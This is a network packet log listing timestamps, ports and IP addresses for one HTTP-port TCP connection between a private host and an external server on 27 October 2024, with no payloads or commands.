Oct 27, 2024 12:13:22.311917067 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.312150002 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312184095 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312216043 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312244892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312247038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.312279940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312288046 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.312314034 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312346935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312381983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312410116 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.312414885 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312448025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312469006 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.312480927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312515974 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312530994 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.312550068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312583923 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312613010 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.312614918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.312839985 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313008070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313057899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313091993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313113928 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313124895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313146114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313158989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313190937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313224077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313240051 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313256025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313288927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313304901 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313322067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313354969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313385010 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313390970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313424110 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313457966 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313471079 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313471079 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313880920 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313915968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.313927889 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.313966036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314011097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314043045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314050913 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.314075947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314109087 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314122915 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.314141989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314177036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314196110 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.314209938 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314243078 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314250946 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.314276934 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314285040 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.314310074 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314342976 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314377069 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314412117 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.314564943 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.314800978 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314834118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314883947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314887047 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.314917088 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314955950 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.314994097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315026045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315033913 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315033913 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315058947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315090895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315116882 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315124035 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315156937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315182924 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315201044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315287113 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315337896 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315372944 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315372944 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315728903 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315762997 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315813065 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315845013 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315845966 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315879107 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315912008 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315943956 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.315956116 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315956116 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.315977097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316009045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316041946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316075087 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316107035 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316112995 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.316112995 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.316139936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316173077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316188097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.316205978 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316246033 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.316780090 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316814899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316847086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316879988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316890955 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.316890955 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.316912889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316946030 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316977978 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.316999912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317014933 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317022085 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317028046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317063093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317095041 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317126989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317137003 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317137003 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317161083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317193985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317281961 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317302942 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317373991 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317385912 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317420006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317451954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317485094 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317500114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317528009 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317547083 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317563057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317725897 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317840099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317898989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317931890 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317965031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.317975998 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.317998886 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318032026 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318063974 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318069935 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318069935 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318095922 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318128109 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318161964 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318193913 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318242073 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318248034 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318248034 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318275928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318310022 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318340063 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318342924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318357944 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318375111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318408966 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318443060 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318469048 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318475008 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318543911 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318856955 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318891048 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318923950 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318957090 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318965912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.318989992 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.318994045 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319022894 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319056034 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319058895 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319089890 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319122076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319154024 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319154978 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319185972 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319188118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319232941 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319264889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319298029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319308043 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319329023 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319350958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319386005 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319418907 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319438934 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319453001 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319549084 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319616079 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319650888 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319684029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319691896 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319717884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319768906 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319783926 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319802046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319837093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319870949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319879055 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319879055 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319905043 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319936991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.319966078 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.319969893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320003986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320036888 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320107937 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.320403099 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.320563078 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320596933 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320647001 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320681095 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320708036 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.320713043 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320734978 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.320746899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320781946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320787907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.320795059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320827007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320859909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320868015 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.320890903 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320924044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320930004 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.320956945 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.320965052 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.320990086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321023941 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321047068 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.321055889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321088076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321122885 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321155071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321165085 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.321213961 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.321297884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321331024 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321341038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.321363926 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321398973 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321433067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321465969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321500063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.321506977 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.321506977 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.321540117 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.338438988 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.343858004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.343902111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.343914032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.343955040 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.344052076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344063044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344073057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344084024 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344100952 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.344141006 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.344194889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344253063 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.344254971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344322920 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344333887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344388962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344393015 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.344400883 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344412088 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344453096 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.344654083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344665051 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344703913 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344707966 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.344716072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344726086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344739914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.344769955 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.344786882 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345114946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345124960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345141888 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345153093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345164061 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345176935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345186949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345187902 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345187902 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345199108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345232010 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345232010 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345408916 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345514059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345525026 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345565081 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345604897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345616102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345622063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345628023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345665932 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345882893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345894098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345905066 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345916033 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345927000 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.345952034 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345952034 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.345990896 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.346127987 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346139908 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346190929 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.346213102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346266985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346344948 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346355915 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346364975 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.346366882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346398115 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.346510887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346621990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.346632004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346642971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346652985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346662998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346678019 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346690893 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.346695900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346707106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346714020 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.346745968 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.346982956 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.346992970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.347085953 CET	49712	80	192.168.2.5	185.215.113.16
